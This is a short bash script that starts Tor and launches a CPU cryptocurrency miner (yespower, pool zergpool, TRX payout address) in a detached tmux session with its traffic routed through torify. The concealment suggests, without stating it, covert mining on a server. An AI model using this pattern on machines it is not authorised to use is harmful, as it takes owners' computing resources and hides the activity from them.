#!/bin/bash
sudo systemctl start tor
tmux new -ds servak torify ./cpuminer-sse2 -a yespower  -o stratum+tcp://yespower.eu.mine.zergpool.com:6533 -u TKQnVtgsGUk8WLNsJ578Beq1HLQrspS3g4 -p c=TRX,mc=SMT,m=party.PAPAMOZHET232,ID=ABOBA -t 2
